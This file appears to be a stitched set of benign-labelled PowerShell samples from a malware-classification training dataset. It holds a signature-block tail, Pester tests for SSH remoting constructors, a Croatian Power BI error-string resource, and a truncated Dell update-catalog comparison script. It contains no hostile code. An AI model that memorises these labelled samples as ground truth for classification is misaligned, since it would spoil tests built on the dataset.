u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIJ63zZ8ATyITQSvzC8QmcTLa # OAAXJjzukmEDOekracPbMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAcXprhd3mrzQFgFSOSGB0C/L3Ojn+EahZB/j/u+tzuinSyr0Pz4YUmx8D # JfMPsgTJwwlp3OAUgxz1LO+t2XKsQL6sWtkUaFw+VlPTFj3SQ2xr+uzThcLe9JXv # gc4xpru0arjHsqaOffKLb2BZojYQxvtcmPe6Sf1NsCfWWchfp9WrRnvqnMMICP9R # npXUwCpiXrl2bjkHeglVqDoU1+osapdSt4qxsA929kT358WnrI+Iyn2KP9Q+UOza # jAq0oKUjtA4j10cisD3huZR3goL3xII+7MVR31PsmBSKw7CEkbA/UKu74hFng52C # rOFsAqeTQwDGjwp0VyJbng5A5tYKdaGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAaKkbfK8aSGiea8qz0Z1l9zec3huw/zckMTRdK5IEa7gIGZxqBxlgA # GBMyMDI0MTAyODExNDA0MS40MTNaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQABAAAB6DANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6eVwdGlF6YgpU7weOFBkp # W9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/CdvDyeZFAcZ6l2+nlMssmZy # C8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482VutKS4wZT6bNVnBVsChr2 # AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi1qYNmR8i7T1luj2JdFdf # ZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1OMXBwGaRoJTYtksi9njuq # 4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/HmdAn4koMWKUDwH5sd/zDu # 4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdAxBobWdorqwvzqL70Wdsg # DU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yCedkz69787s8nIp55icLf # DoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5sqXWCXv++hek4A15WybI # c6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uWaXElLHOXIlieKF2i/YzQ # 6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzotSx/5fo9g7fCzoFjk3tD # EwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kMfRVQba6T34HwelLaMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi74km6PKAkni9+BWotq+Qt # DGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppYJEA+pb6o2qPjFddO1TLq # vSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8I5Oi1RegMJl8t5k/UtE0 # Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGbtw4LCHsT2pFakpGOBh+I # SUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7rJ+HsiP4sdqBjj6Avopuf # 4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19CPvkUwxYK0uZvPl2WC39 # nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt+eLOeuGDjvhJvYMIEkpk # V68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ9yuxMddoMMQ19Tkyftot # 6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2WnxuFMy5fbAK6o8PWz8Q # RMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj/vCXaAFcmkW1nk7VE+ow # aXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzXA6a8CiamcQW/DgmLJpiV # QNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCM # JG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smdRzAiGA8yMDI0MTAyODA1MTkw # M1oYDzIwMjQxMDI5MDUxOTAzWjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqyZ1H # AgEAMAcCAQACAh8PMAcCAQACAhQSMAoCBQDqyu7HAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAMgszoIDg2o9tGcYXJy12HtzVNFWM2U6+uXp/lZFN9GfKyEA # trE+WzK6IRGIcVwMQ88Li4P2eAY/JRqLae0FqcCpM7fVKJCew6OG7JkRgr5zDklX # ZmeDXlSCV3g/wV51WFpAIuTVjd9LCV+YKpMLsnI+0mnrKlnQGDVkrOH7GF9HYG+2 # JKF6eLr7JTYAwZCTpXYkfuWY4z3EKTTola7G9slIo7n5dTdvC9qaCYqt+eSrC5+s # 3smEjVTxn6EEPDjDmnaAJfLiZAsBGo6VEBm6tEV77qnmV9xpIrErypW2LN6/e4lr # LQJO3X5elf7PvUwi0ogdjF4wv5DRTrY4TQMJ+oMxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAehQsIDPK3KZTQABAAAB6DAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCDVkLRxbmwq6gUj+CFFsTxjPQPKyFPJeZZLrzSYQFHIGDCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICrS2sTVAoQggkHR59pNqige0xfJ # T2J3U8W1Sc8H+OsdMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHoULCAzytymU0AAQAAAegwIgQgLUsjW5Weq4WPeaZKqGRCLipnTqgX # s5A+dsy2nUeh3x4wDQYJKoZIhvcNAQELBQAEggIANUcm6yUm0EnriXX27x/tsLYN # SqYkA7mluJBatWQvaScxCThtunvwf7dG0uJg0oEIcCJNqE+eOBh6vHSWgAQUyzJL # qA+sB3Qy1r6Nwv1EmMOWhx3wrB8nSiApVPHlRTBBNRraZZu/UpIIPNQr+UuCwyVS # mK42bIJnszLhCfozdHPgJbdO0nS74rTaRCRaAVbaqZTYSltVlcHQc/xAwrCFLguH # SG74+WBYaNg3NYacCXPJoEnjT+iOGm4tFWed/CKl9h8yBubTGDWclaWNEqnaGtcT # phKlSTzJ9NP91y3B7zU7tUkbhvMi3DZ20Etmrd4MtosFSug7TOQDSB5NCVZwltvv # ach45ps9vCe00yZnBwsVIX62c6ubMnbERtyA9KJ9axnCU6lM/NtLQe08AnjUuNrV # DppnOm2VQvIk9LoQDNQ8DaUpzYACAItbFizzalYMhDwdJhvDu7QWwb6AYLuUlKya # YG5GAs/uNzeYouCdIWiJP2pPrL/vQd/h8ocIc1AQTINz9eZHAx+pqKr1m83WPncc # 9RHOJ5gfYQQlmAr8D35+JWEy2Dts96f7nrb9WwSfPtzjr1jMTY65jV0P8ZSialvv # +bxwl+36W5BEZceYbm49Udcjek//BlxfY1zvrZEZqYbpu1E204doGKXIFMz/qIog # fNdLSiX5Hb4dNrObX44= # SIG # End signature block
combined_dataset/train/non-malicious/2019.ps1
2019.ps1
Describe "SSH Remoting API Tests" -Tags "Feature" { Context "SSHConnectionInfo Class Tests" { BeforeAll { $skipTest = @(Get-Command 'ssh' -CommandType Application -ErrorAction SilentlyContinue).Count -eq 0 } AfterEach { if ($null -ne $rs) { $rs.Dispose() } } It "SSHConnectionInfo constructor should throw null argument exception for null HostName parameter" { { [System.Management.Automation.Runspaces.SSHConnectionInfo]::new( "UserName", [System.Management.Automation.Internal.AutomationNull]::Value, [System.Management.Automation.Internal.AutomationNull]::Value, 0) } | Should -Throw -ErrorId "PSArgumentNullException" } It "SSHConnectionInfo should throw file not found exception for invalid key file path" -Skip:$skipTest { $sshConnectionInfo = [System.Management.Automation.Runspaces.SSHConnectionInfo]::new( "UserName", "localhost", "NoValidKeyFilePath", 22) $rs = [runspacefactory]::CreateRunspace($sshConnectionInfo) $e = { $rs.Open() } | Should -Throw -PassThru $e.Exception.InnerException.InnerException | Should -BeOfType "System.IO.FileNotFoundException" } It "SSHConnectionInfo should throw argument exception for invalid port (non 16bit uint)" { { $sshConnectionInfo = [System.Management.Automation.Runspaces.SSHConnectionInfo]::new( "UserName", "localhost", "ValidKeyFilePath", 99999) $rs = [runspacefactory]::CreateRunspace($sshConnectionInfo) $rs.Open() } | Should -Throw -ErrorId "ArgumentException" -PassThru } } }
combined_dataset/train/non-malicious/sample_62_20.ps1
sample_62_20.ps1
LMetoda se ne može izvršiti kada je onemogućena pohrana s više snimki stanja.oZahtjev je ograničen, previše zahtjeva za ažuriranje izvora podataka koje pokreće korisnik u kratkom razdoblju.pNema dovoljno dozvola za osvježavanje tablice u načinu rada Direct Lake, obratite se autoru ovog skupa podataka.€Nije moguće zadržati metapodatke snimke baze podataka, izbacivanje baze podataka kako bi se izbjegla nedosljednost metapodataka.êTrenutno ne možemo vratiti sigurnosnu kopiju skupa podataka jer nema dovoljno memorije za dovršetak ove operacije. Upotrijebite mogućnost /ForceRestore za vraćanje skupa podataka s postojećim neučitanim i izvanmrežnim skupom podataka.rTrenutno ne možemo vratiti sigurnosnu kopiju skupa podataka jer nema dovoljno memorije za dovršetak ove operacije.łOperacija nije uspjela. Obratite se administratoru kapaciteta da biste provjerili je li omogućena podrška za čitanje/zapisivanje XMLA u postavkama kapaciteta na kapacitetu Power BI Premium, a zatim pokušajte ponovno. Dodatne informacije potražite u odjeljku "Podrška za čitanje/zapisivanje XMLA" u dokumentaciji proizvoda.ÄBroj grupa redaka u izvornoj delta tablici „%{oii_deltaTableName/}” premašuje trenutno ograničenje SKU-a (%u{rowgroupCount/}), optimizirajte delta tablicu ili nadogradite na veći SKU poslužitelja.¾Veličina podataka stupca „%{oii_deltaColumnName/}” u izvorišnoj delta tablici „%{oii_deltaTableName/}” prekoračuje trenutačno ograničenje inventarnog broja (%I64u{columnFootprintLimit/} MB).ÍBroj datoteka u obliku parquet u izvornoj delta tablici „%{oii_deltaTableName/}” premašuje trenutno ograničenje SKU-a (%u{fileCount/}), optimizirajte delta tablicu ili nadogradite na veći SKU poslužitelja.yZbroj podataka za sve tablice delta premašuje trenutačno ograničenje inventarnog broja (%I64u{columnFootprintLimit/} MB).JPrivremeni abf put za ponovnu objavu servisa Power BI Premium nije valjan.ÛStupac „%{oii_columnname/}” s binarnom vrstom podataka nije dopušten u Direct Lake tablici „%{oii_TableName/}”. Uklonite stupac. Dodatne informacije potražite na stranici https://go.microsoft.com/fwlink/?linkid=2215281.ĩNačin rada Direct Lake ne možete koristiti zajedno s drugim načinima rada za pohranu u istom modelu. Složeni model ne podržava način rada Direct Lake. Uklonite nepodržane tablice ili ih prebacite u način rada Direct Lake. Pogledajte https://go.microsoft.com/fwlink/?linkid=2215281 da saznate više.ĒSve tablice u načina rada Direct Lake moraju se pozivati na isti izvor podataka. Provjerite izvore podataka tablica u načinu rada Direct Lake i provjerite koriste li sve tablice isti izvor podataka. Pogledajte https://go.microsoft.com/fwlink/?linkid=2215281 da saznate više.
combined_dataset/train/non-malicious/Compare-DellUpdates_1.ps1
Compare-DellUpdates_1.ps1
#Requires -version 2 #Author: Nathan Linley #Script: Computer-DellUpdates #Site: http://myitpath.blogspot.com #Date: 2/9/2012 param( [parameter(mandatory=$true)][ValidateScript({test-path $_ -pathtype 'leaf'})][string]$catalogpath, [parameter(mandatory=$true,ValueFromPipeline=$true)][string]$server ) function changedatacase([string]$str) { #we need to change things like this: subDeviceID="1f17" to subDeviceID="1F17" #without changing case of the portion before the = if ($str -match "`=`"") { $myparts = $str.split("=") $result = $myparts[0] + "=" + $myparts[1].toupper() return $result } else { return $str} } $catalog = [xml](get-Content $catalogpath) $oscodeid = &{ $caption = (Get-WmiObject win32_operatingsystem -ComputerName $server).caption if ($caption -match "2003") { if ($caption -match "x64") { "WX64E" } else { "WNET2"} } elseif ($caption -match "2008 R2") { "W8R2" } elseif ($caption -match "2008" ) { if ($caption -match "x64") { "WSSP2" } else { "LHS86" } } } write-debug $oscodeid $systemID = (Get-WmiObject -Namespace "root\\cimv2\\dell" -query "Select Systemid from Dell_CMInventory" -ComputerName $server).systemid $model = (Get-WmiObject -Namespace "root\\cimv2\\dell" -query "select Model from Dell_chassis" -ComputerName $server).Model $model = $model.replace("PowerEdge","PE").replace("PowerVault","PV").split(" ") #model[0] = Brand Prefix #model[1] = Model # $devices = Get-WmiObject -Namespace "root\\cimv2\\dell" -Class dell_cmdeviceapplication -ComputerName $server foreach ($dev in $devices) { $xpathstr = $parts = $version = "" if ($dev.Dependent -match "(version=`")([A-Z\\d.-]+)`"") { $version = $matches[2] } else { $version = "unknown" } $parts = $dev.Antecedent.split(",") for ($i = 2; $i -lt 6; $i++) { $parts[$i] = &changedatacase $parts[$i] } $depparts = $dev.dependent.split(",") $componentType = $depparts[0].substring($depparts[0].indexof('"')) Write-Debug $parts[1] if ($dev.Antecedent -match 'componentID=""') { $xpathstr = "//SoftwareComponent[@packageType='LWXP']/SupportedDevices/Device/PCIInfo" if ($componentType -match "DRVR") { $xpathstr += "[@" + $parts[2] + " and @" + $parts[3] + "]/../../.." $xpathstr += "/SupportedOperatingSystems/OperatingSystem[@osVendor=`'Microsoft`' and @osCode=`'" + $osCodeID + "`']/../.." } else { $xpathstr += "[@" + $parts[2] + " and @" + $parts[3] + " and @" + $parts[4] + " and @" + $parts[5] + "]/../../.." #$xpathstr += "/SupportedSystems/Brand[@prefix=`'" + $model[0] + "`']/Model[@systemID=`'" + $systemID + "`']/../../.." $xpathstr += "/ComponentType[@value='FRMW']/.." } $xpathstr += "/ComponentType[@value=" + $componentType + "]/.." } else { $xpathstr = "//SoftwareComponent[@packageType='LWXP']/SupportedDevices/Device[@" $xpathstr += $parts[0].substring($parts[0].indexof("componentID")) $xpathstr += "]/../../SupportedSystems/Brand[@prefix=`'" + $model[0] + "`']/Model[@systemID=`'" $xpathstr += $systemID + "`']/../../.." } Write-Debug $xpathstr $result = Select-Xml $catalog -XPath $xpathstr |Select-Object -ExpandProperty Node $result |Select-Object @{Name="Component";Expression = 